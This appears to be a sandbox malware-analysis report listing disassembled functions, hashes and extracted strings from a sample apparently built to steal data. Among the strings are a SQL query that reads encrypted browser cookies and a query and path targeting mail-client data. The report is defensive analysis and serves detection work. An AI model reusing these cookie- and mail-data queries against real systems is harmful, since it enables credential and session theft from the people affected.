                                                                • Opcode Fuzzy Hash: b859791258a2e0f24f3a844bb054ee1a1115f4370c06f0bf45cf4e6d10df2d5b
                                                                • Instruction Fuzzy Hash: 3BC21B75900219DFEB24DFA0DD48FEEB7B4BB48304F0081EAE50AA7261DB745A89CF54
                                                                Function 00442F90 Relevance: 16.6, Strings: 12, Instructions: 1606COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.0000000000442000.00000040.00000400.00020000.00000000.sdmp, Offset: 00442000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_442000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 1B052C1B04312E1D$L@$PX@$PX@$PX@$SELECT encrypted_value, ((expires_utc/1000000)-11644473600), host_key, name, path FROM cookies$d$h@$h@$tGFCtoXKnErXFNGYlaMkWOY$t@$@
                                                                • API String ID: 0-2665189159
                                                                • Opcode ID: b9c3920b2c079de716ae894c5a54bd43776fd71a0d43d355396d121a790622c7
                                                                • Instruction ID: 916fd7502ef8a21e04aa9b39618efe040638dca8792a33bca48ff450cb665633
                                                                • Opcode Fuzzy Hash: b9c3920b2c079de716ae894c5a54bd43776fd71a0d43d355396d121a790622c7
                                                                • Instruction Fuzzy Hash: 94E20CB1D002189FDB25DB65CD85BEEB7B8FF48300F1085EAE50AB6250EA745E85CF64
                                                                Function 00417F80 Relevance: 10.9, Strings: 8, Instructions: 933COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • VionyLfHcqHlYLmmMlDcqMypNYpvXekg, xrefs: 0041844D
                                                                • 363F34153829370203063B586B571F2D1D362338, xrefs: 00418824
                                                                • 332F323B1C0E3C3D4B5556, xrefs: 00418802
                                                                • 391D010D2305270F51724C, xrefs: 00418409
                                                                • ahTcrdAgusEpWMMhIjUDc, xrefs: 0041858D
                                                                • QwODyQJVvjiUx, xrefs: 00418986
                                                                • ScNAHkaNYkovVYFSHWAdws, xrefs: 00418846
                                                                • 3D2706000A200A10537F50, xrefs: 0041842B
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.0000000000409000.00000040.00000400.00020000.00000000.sdmp, Offset: 00409000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_409000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 332F323B1C0E3C3D4B5556$363F34153829370203063B586B571F2D1D362338$391D010D2305270F51724C$3D2706000A200A10537F50$QwODyQJVvjiUx$ScNAHkaNYkovVYFSHWAdws$VionyLfHcqHlYLmmMlDcqMypNYpvXekg$ahTcrdAgusEpWMMhIjUDc
                                                                • API String ID: 0-844091784
                                                                • Opcode ID: 29174d9b11d1230606c2f2a90d92b7f92269edb18fde9d3187183c982bf4e798
                                                                • Instruction ID: 8c83b7be8a1fbfb37f9719d004a400fc2d39cff9a53a708be0de2db02621a859
                                                                • Opcode Fuzzy Hash: 29174d9b11d1230606c2f2a90d92b7f92269edb18fde9d3187183c982bf4e798
                                                                • Instruction Fuzzy Hash: 81A20875900218DFDB24DFA4DD48BEEB7B5FB48300F1081AAE50AB72A0DB745A89CF55
                                                                Function 004466C0 Relevance: 10.4, Strings: 8, Instructions: 379COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.0000000000442000.00000040.00000400.00020000.00000000.sdmp, Offset: 00442000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_442000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: :@$040C24015C7C7D27241914252A6A0A2117$2E381C01794B641D271E42152D35390F30260527031532662523055E2A0A3F0F2207090C672424073F201D220301783B2E231F5C2A146519381D0114$6:@$FlxPqfSRTLvcLZDdDcTWQYk$HFLhqCdKjPilxHQPnSIiKfrW$h9@$x9@
                                                                • API String ID: 0-2034636210
                                                                • Opcode ID: acf24749e2ba75ef428dffeb0cbe46bf0023935ab0bfcc84543cb84fa91e52dc
                                                                • Instruction ID: 7e9af9f42558f6b55106e549d93544b25c35dbae1d652503745173001a822c86
                                                                • Opcode Fuzzy Hash: acf24749e2ba75ef428dffeb0cbe46bf0023935ab0bfcc84543cb84fa91e52dc
                                                                • Instruction Fuzzy Hash: 56E10AB1D00208EFDB04DFA4D989ADEBBB8FF48705F10816AE506B7290DB785A45CF65
                                                                Function 00445C50 Relevance: 9.2, Strings: 7, Instructions: 465COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.0000000000442000.00000040.00000400.00020000.00000000.sdmp, Offset: 00442000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_442000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 066F0D16042E042F1B2A370E043711303E28$100B342C243218783501$C:\\MailMasterData\$NLxQMVQpVQc$SELECT c0, c1, c2, c3, c4, c5 FROM Search_content$aEUQJIOmCVKDz$d
                                                                • API String ID: 0-1343124265
                                                                • Opcode ID: 65ded4fa77c5fc1c2391779a054c03fb916af32daf82d4984abd83536c211a5e
                                                                • Instruction ID: ef0f2a48f32f644fa82d9ce671ec610aaeb4962b4268a45352652d9b70100bbe
                                                                • Opcode Fuzzy Hash: 65ded4fa77c5fc1c2391779a054c03fb916af32daf82d4984abd83536c211a5e
                                                                • Instruction Fuzzy Hash: D822E675900208DBDB14DFE0DD58BEEBBB8FB48304F10856AE506BB2A4EB745A49CF54
                                                                Function 00414F41 Relevance: 7.5, Strings: 5, Instructions: 1228COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.0000000000409000.00000040.00000400.00020000.00000000.sdmp, Offset: 00409000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_409000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 181D3B300B0C632A133624$36360B05363A02013829162007016A15172711$EDQTWbbCnrB$JjrncWOnudeyGnoJQvSpuJoDiXZfPyqJFLVktCmbKE$S
                                                                • API String ID: 0-2344341022
                                                                • Opcode ID: a4ef455bbad10724af73cf928306f8447cd2ac8a2b3510c102a7702b66ee856a
                                                                • Instruction ID: 1d80b7ca4a9679042b853dc808247cd1e1fb43c99fdd9b8638e2beaff48943b0
                                                                • Opcode Fuzzy Hash: a4ef455bbad10724af73cf928306f8447cd2ac8a2b3510c102a7702b66ee856a
                                                                • Instruction Fuzzy Hash: 0AD21874A00218CFDB24DF54DD84BE9B7B5BB85304F1081EAE50AB72A0DB749AC9CF59
                                                                Function 004150A5 Relevance: 7.4, Strings: 5, Instructions: 1168COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.0000000000409000.00000040.00000400.00020000.00000000.sdmp, Offset: 00409000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_409000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 181D3B300B0C632A133624$36360B05363A02013829162007016A15172711$EDQTWbbCnrB$JjrncWOnudeyGnoJQvSpuJoDiXZfPyqJFLVktCmbKE$S
                                                                • API String ID: 0-2344341022
                                                                • Opcode ID: 916551cf27e163c1e4338470e2aea6aaceb2a7fbd12f38cd0f8426936acf4f70
                                                                • Instruction ID: bd5467d4c7219f02fa95c3b7818a49fcef9d129ac822b124723cffbc0be7d52c
                                                                • Opcode Fuzzy Hash: 916551cf27e163c1e4338470e2aea6aaceb2a7fbd12f38cd0f8426936acf4f70
                                                                • Instruction Fuzzy Hash: 68C21974A00218DFDB24CF54DD84BE9B7B5BB89304F1081EAE50AB7260DB749AC9CF59
                                                                Function 0040EFF0 Relevance: 5.3, Strings: 4, Instructions: 262COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • FjslXDqrQFysJCvwSSeWjKovJGHgAELut, xrefs: 0040F262
                                                                • 4D5B2C143D24322F200E131333, xrefs: 0040F240
                                                                • rsewWqmbmoOAWnhMrRiJQWIgSPvcNovPA, xrefs: 0040F28F
                                                                • 3130201114333D10143D2E767F, xrefs: 0040F21E
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.0000000000409000.00000040.00000400.00020000.00000000.sdmp, Offset: 00409000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_409000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 3130201114333D10143D2E767F$4D5B2C143D24322F200E131333$FjslXDqrQFysJCvwSSeWjKovJGHgAELut$rsewWqmbmoOAWnhMrRiJQWIgSPvcNovPA
                                                                • API String ID: 0-1138420584
                                                                • Opcode ID: cd6ecd5f732ec031bd20cc20ce9c0df5ec3aaf2db92eed7bf09a01bb8c2c22fc
                                                                • Instruction ID: 0d7af7b9a898c557098a5bf20080043ae5406268889af0eb2d229f73f1fe6364
                                                                • Opcode Fuzzy Hash: cd6ecd5f732ec031bd20cc20ce9c0df5ec3aaf2db92eed7bf09a01bb8c2c22fc
                                                                • Instruction Fuzzy Hash: 7AC129B5900208DFDB14DFA4D988BDEBBB5FF88304F10816AE506B72A4DB745A49CF54
                                                                Function 00440001 Relevance: 3.5, Strings: 2, Instructions: 993COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.0000000000440000.00000040.00000400.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_440000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: b$tGFCtoXKnErXFNGYlaMkWOY
                                                                • API String ID: 0-2266132197
                                                                • Opcode ID: 6c393281caf28c15de6841912ab5e298287af03579db4c2d93bde46b936cf837
                                                                • Instruction ID: 82016e5d36ee08e52a847d93ea66da6b4869ee119fb7e91b8b5119910f57afb3
                                                                • Opcode Fuzzy Hash: 6c393281caf28c15de6841912ab5e298287af03579db4c2d93bde46b936cf837
                                                                • Instruction Fuzzy Hash: C3A24D74900218DFDB14DFA4DE88AAEB7B5FB49301F2081ADE506B7260DB749D89CF58
                                                                Function 0041C000 Relevance: 2.2, Strings: 1, Instructions: 914COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.000000000041C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041C000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_41c000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: <
                                                                • API String ID: 0-4251816714
                                                                • Opcode ID: a299c3a624bf272ff383ff67790f12456e47e15e0ecb289e08629e47ac83205e
                                                                • Instruction ID: a22fc936b4477584f7b8fa621d03d12e20b4374b85fc76ff3b4de01f294d6573
                                                                • Opcode Fuzzy Hash: a299c3a624bf272ff383ff67790f12456e47e15e0ecb289e08629e47ac83205e
                                                                • Instruction Fuzzy Hash: 12A2E4B49002199FDB54DF54CD88BDDB7B4BB48304F1082EAE90AAB291DB749EC5CF94
                                                                Function 0041800C Relevance: .4, Instructions: 384COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.0000000000409000.00000040.00000400.00020000.00000000.sdmp, Offset: 00409000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_409000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0eb60031268e2e011556d5775ed9f1d9066dd914af78c4d91272029f8532bd07
                                                                • Instruction ID: 5818740b90a89bd3280bac99122788a0984e93edbd06f084abeb884c0ac45b0c
                                                                • Opcode Fuzzy Hash: 0eb60031268e2e011556d5775ed9f1d9066dd914af78c4d91272029f8532bd07
                                                                • Instruction Fuzzy Hash: 1F120474A00228DFDB24DF54D984BEEB7B5BB49300F1081EAE50AA72A0DB745AC9CF55
                                                                Function 00440EC0 Relevance: .1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.0000000000440000.00000040.00000400.00020000.00000000.sdmp, Offset: 00440000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_440000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5e1c96632266fc78cd23cfb6a2968a2ff4e905c65320634321b8c5b5ad600972
                                                                • Instruction ID: 3f16d3a29f2f85e3b44e2e55cd98bea0c07c0e7ab9c05be83a32fa0be27be078
                                                                • Opcode Fuzzy Hash: 5e1c96632266fc78cd23cfb6a2968a2ff4e905c65320634321b8c5b5ad600972
                                                                • Instruction Fuzzy Hash: 07314D70940259DFDB24DF54CE49BAEBBB8BB44701F1081A9F506B72A0EB785B48CF54
                                                                Function 0040965F Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.0000000000409000.00000040.00000400.00020000.00000000.sdmp, Offset: 00409000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_409000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 65d1f4d00754aa00a9fa8740567204aed91d3390c2f1590726448c6f389933c3
                                                                • Instruction ID: f94953d868a7eb1553e617dc084a077d806f152bc635abb11635d3b95011cab3
                                                                • Opcode Fuzzy Hash: 65d1f4d00754aa00a9fa8740567204aed91d3390c2f1590726448c6f389933c3
                                                                • Instruction Fuzzy Hash: 87E0E20029E3C56EC31347604C21AA13FB48A4394471E08EBD4C5DB1E3C92D8D0AC32A
                                                                Function 00403F40 Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Offset: 00403000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_403000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3090598da8829f139716fc4927b60a2cc664260a0451df29e4aa613f5b100701
                                                                • Instruction ID: abb52354a84035ad187bad71fca4c6b09fc4a90e94978ed3b9bbefe8e0325f4a
                                                                • Opcode Fuzzy Hash: 3090598da8829f139716fc4927b60a2cc664260a0451df29e4aa613f5b100701
                                                                • Instruction Fuzzy Hash: A1D04E1190E3C28FC313573548260947FB50E53A0130B06EBE0C0CA0E3C02C0809C37A

                                                                Non-executed Functions

                                                                Function 004457E6 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2715156422.0000000000442000.00000040.00000400.00020000.00000000.sdmp, Offset: 00442000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_442000_OdoiXyuXnaQN.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: >$X@$p@$p@
                                                                • API String ID: 0-568922844
                                                                • Opcode ID: e7b376eb3276064a0b6c0f6046556fd3750c8e6f868930932ca8a27dc879c519
                                                                • Instruction ID: 20a9cbd50388f711f78ae6d8b24af8ddcaa5f2c40a6d474f4ea2e1b2d3f63065
                                                                • Opcode Fuzzy Hash: e7b376eb3276064a0b6c0f6046556fd3750c8e6f868930932ca8a27dc879c519
                                                                • Instruction Fuzzy Hash: E651F8B4900219DFDB28CF45D989BDAB7B4BF48300F00C1EAE549A7361EB749A85DF94